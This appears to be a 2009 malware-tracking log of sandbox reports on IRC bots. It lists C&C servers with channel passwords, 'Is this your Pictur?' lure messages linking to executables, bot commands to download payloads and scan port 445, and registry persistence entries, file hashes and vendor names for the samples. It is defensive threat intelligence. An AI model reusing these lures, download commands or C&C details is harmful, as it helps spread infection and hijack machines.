Monday 7 December 2009

k2r.th3kings.net

k2r.th3kings.net 208.96.62.2

* C&C Server: 208.96.62.2:27034
* Server Password:
* Username: XP-2677
* Nickname: [00|DEU|401746]
* Channel: #!!kk!!# (Password: aaaaaaa)
* Channeltopic: :.msn.msg Is this your Pictur? http://larvax.com/fotos.exe?=


Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce "wextract_cleanup0" = rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Java Update" = buthass.exe.exe
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager "PendingFileRenameOperations"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce "wextract_cleanup0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Advanced INF Setup "AdvpackLogFile"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"


File Changes by all processes
New Files
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\TMP4351$.TMP
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
\Device\Tcp
\Device\Ip
\Device\Ip
C:\WINDOWS\buthass.exe.exe
C:\WINDOWS\buthass.exe.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\RasAcd
Opened Files
\\.\PIPE\lsarpc
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\
\\.\Ip
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
\\.\Ip
Deleted Files
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Chronological Order
Get File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP Flags: (SECURITY_ANONYMOUS)
Create File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\TMP4351$.TMP
Get File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe Flags: (SECURITY_ANONYMOUS)
Create File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Set File Time: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Set File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe Flags: (FILE_ATTRIBUTE_ARCHIVE SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\ ()
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Set File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\*
Create/Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe (OPEN_ALWAYS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\ ()
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\buthass.exe.exe Flags: (SECURITY_ANONYMOUS)
Copy File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe to C:\WINDOWS\buthass.exe.exe
Set File Attributes: C:\WINDOWS\buthass.exe.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\buthass.exe.exe
Create/Open File: C:\WINDOWS\buthass.exe.exe (OPEN_ALWAYS)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)

bub.th3kings.net

bub.th3kings.net 217.148.32.202

* C&C Server: 217.148.32.202:27034
* Server Password:
* Username: XP-1568
* Nickname: [00|DEU|051548]
* Channel: #!!kk!!# (Password: aaaaaaa)
* Channeltopic: :.msn.msg Is this your Pictur? http://th3bestgirl.com/fotos.exe?=
* Private Message Deleted
o Value: :Cs!XP@yes.gov PRIVMSG #!!kk!!# :.login yeste
o Value: :Cs!XP@yes.gov PRIVMSG #!!kk!!# :.msn.msg Is this your Pictur? http://th3bestgirl.com/chek.exe?=


Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Java Update" = fitnets.exe.exe
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"



File Changes by all processes
New Files
\Device\Tcp
\Device\Ip
\Device\Ip
C:\WINDOWS\fitnets.exe.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\RasAcd
Opened Files
\\.\Ip
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
\\.\Ip
Deleted Files
Chronological Order
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\fitnets.exe.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\kar.EXE to C:\WINDOWS\fitnets.exe.exe
Set File Attributes: C:\WINDOWS\fitnets.exe.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\fitnets.exe.exe
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)

CancerTreatmentCenter.org

Remote Host Port Number
199.71.215.177 51987

MODE pLagUe{USA}91936 -ix
JOIN #Plague
PONG CancerTreatmentCenter.org
PRIVMSG #Plague :
New PC Infected.


* The following port was open in the system:

Port Protocol Process
1052 TCP raidhost.exe (%Windir%\raidhost.exe)

Registry Modifications

* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ raidhost = "raidhost.exe"

so that raidhost.exe runs every time Windows starts


Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
raidhost.exe %Windir%\raidhost.exe 356 352 bytes


File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash Alias
1 %Windir%\raidhost.exe [file and pathname of the sample #1]
  File Size: 106 496 bytes
  File Hash: MD5: 0x4CD2EE467C392D48581372387C7BD205
             SHA-1: 0xADCD9AD5BC992F5E2617B97950A944A2120465E6
  Alias: Worm.Win32.Carrier.hn [Kaspersky Lab]
2 %System%\YoItzVlad.tmp
  File Size: 5 bytes
  File Hash: MD5: 0xD356C81C0BDF1FE2059EABDA720CA0D4
             SHA-1: 0x6A09BBFD26586342F7A9F19B82EBBE5AAB023E06
  Alias: (not available)

leaf.rice.net

Remote Host Port Number
85.234.148.2 17402

Other details

* The following port was open in the system:

Port Protocol Process
1050 TCP lsass.exe (%Windir%\system\lsass.exe)

Registry Modifications

* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ lsass = "lsass.exe"

so that lsass.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
lsass.exe %Windir%\system\lsass.exe 380 928 bytes

File System Modifications

* The following file was created in the system:

# Filename(s) File Size File Hash Alias
1 %Windir%\system\lsass.exe [file and pathname of the sample #1]
  File Size: 80 384 bytes
  File Hash: MD5: 0xAEAF1BC7032A1D16D04012123474405A
             SHA-1: 0x3A5FF63343F0F291550A581896A816EB7690EC11
  Alias: Net-Worm.Spybot [PCTools]
         W32.Spybot.Worm [Symantec]
         Backdoor.Win32.IRCBot.gen [Kaspersky Lab]
         New Malware.b [McAfee]
         Mal/Generic-A, Mal/SillyFDC-A, Mal/IRCBot-B [Sophos]
         Backdoor:Win32/Gaertob.A [Microsoft]
         Win32/IRCBot.worm.Gen [AhnLab]

Sunday 6 December 2009

love.blowingbabes.net

* Unknown Connections
o Host By Name:
+ Requested Host: love.blowingbabes.net
+ Resulting Address: 192.168.1.1
o Connection Established: 0
o Socket: 0

* UDP Connections
o Send Datagram
+ Remote Address 192.168.1.1
+ Remote Port: 6061
+ Size: 7
o Receive Datagram
+ Local Port: 0
+ Remote Address 192.168.1.1
+ Remote Port: 6061
+ Size: 0
o Plain Communication Data
+ Send
# Dump Line:
* Off Set: $0000
* Dump: 61 C6 6A 5F E1 4F A3
* ASCII: a.j_.O.
o Transport Protocol: UDP
o Remote Address: 192.168.1.1
o Remote Port: 6061
o Protocol: Unknown
o Connection Established: 1
o Socket: 2520

# File System Changes...

* Open File:
o File: \\.\PIPE\lsarpc
o File Type: namedpipe
o Creation/Distribution: OPEN_EXISTING
o Desired Access: FILE_ANY_ACCESS
o Share Access: FILE_SHARE_READ FILE_SHARE_WRITE
o Flags: SECURITY_ANONYMOUS
* Create Open File
o File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\wmfcgr.exe
o File Type: file
o Source File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
o Creation/Distribution: OPEN_ALWAYS
o Desired Access: FILE_ANY_ACCESS
o Share Access: FILE_SHARE_READ
o Flags: SECURITY_ANONYMOUS
o Stored as: ae8705a7b4bf8c13e5d8214d374e6c34.exe
o File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\Desktop.ini
o File Type: file
o Source File Hash: E783BDD23F0A976E00AE00AAE1FF460024487420
o Creation/Distribution: OPEN_ALWAYS
o Desired Access: FILE_ANY_ACCESS
o Share Access: FILE_SHARE_READ
o Flags: SECURITY_ANONYMOUS
o File: \Device\RasAcd
o File Type: file
o Source File Hash: hash_error
o Creation/Distribution: OPEN_ALWAYS
o Desired Access: FILE_ANY_ACCESS FILE_READ_ACCESS FILE_READ_DATA FILE_LIST_DIRECTORY FILE_WRITE_ACCESS FILE_WRITE_DATA FILE_ADD_FILE
o Share Access: FILE_SHARE_READ FILE_SHARE_WRITE
o Flags: FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS
* Copy File
o File: C:\12053046.exe
o File Type: file
o Source File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
o Creation/Distribution: CREATE_ALWAYS
o Desired Access: FILE_ANY_ACCESS
o Flags: SECURITY_ANONYMOUS
o Stored as: ae8705a7b4bf8c13e5d8214d374e6c34.exe
o Destination File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\wmfcgr.exe
o Destination File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
* Set File Attributes
o File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\wmfcgr.exe
o File Type: file
o Source File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
o Desired Access: FILE_ANY_ACCESS
o Flags: FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS
* Create Named Pipe
o File: \\.\pipe\trgnex
o File Type: namedpipe
o Desired Access: FILE_ANY_ACCESS
o Flags: SECURITY_ANONYMOUS

98.126.125.202(hub.us.com)

Remote Host Port Number
112.78.219.146 80
222.76.217.154 80
98.126.125.202 47221

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi


PRIVMSG [N00_USA_XP_3663
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.187.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE #x -ix
MODE #ma -ix
PRIVMSG #i :HTTP SET http://zonetech.info/68.exe
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.

195.190.13.163(hub.us.com)

Remote Host Port Number
112.78.219.146 80
222.76.217.154 80
195.190.13.163 47221

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi


MODE [N00_USA_XP_2766612]
@ -ix
PRIVMSG [N00_USA_XP_2766
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.207.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE #g -ix
MODE #sa -ix
PRIVMSG #r :HTTP SET http://zonetech.info/61.exe

Other details

* The following ports were open in the system:

Port Protocol Process
1053 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1056 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1057 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1087 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1464 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2264 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2265 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2266 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2267 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2268 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2269 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2270 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2271 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2272 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2273 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2274 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2275 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2276 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2277 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2278 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2279 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2280 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2281 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2282 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2283 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2284 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2285 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2286 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2287 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2288 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2289 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2290 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2291 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2292 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2293 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2294 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2295 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2296 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2297 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2298 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2299 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2300 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2301 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2302 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2303 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2304 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2305 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2306 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2307 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2308 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2309 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2310 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2311 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2312 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2313 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2314 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2315 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2316 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2317 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2318 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2319 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2320 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2321 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2322 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2323 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2324 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2325 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2326 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2327 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2328 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2329 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2330 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2331 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2332 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2333 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2334 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2335 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2336 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2337 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2338 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2339 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2340 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2341 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2342 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2343 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2344 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2345 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2346 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2347 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2348 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2349 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2350 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2351 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2352 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2353 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2354 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2355 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2356 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2357 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2358 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Update Setup = "%Windir%\jjdrive32.exe"

so that jjdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Microsoft Update Setup = "%Windir%\jjdrive32.exe"

so that jjdrive32.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
jjdrive32.exe %Windir%\jjdrive32.exe 339 968 bytes

* Note:
o %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows or C:\Winnt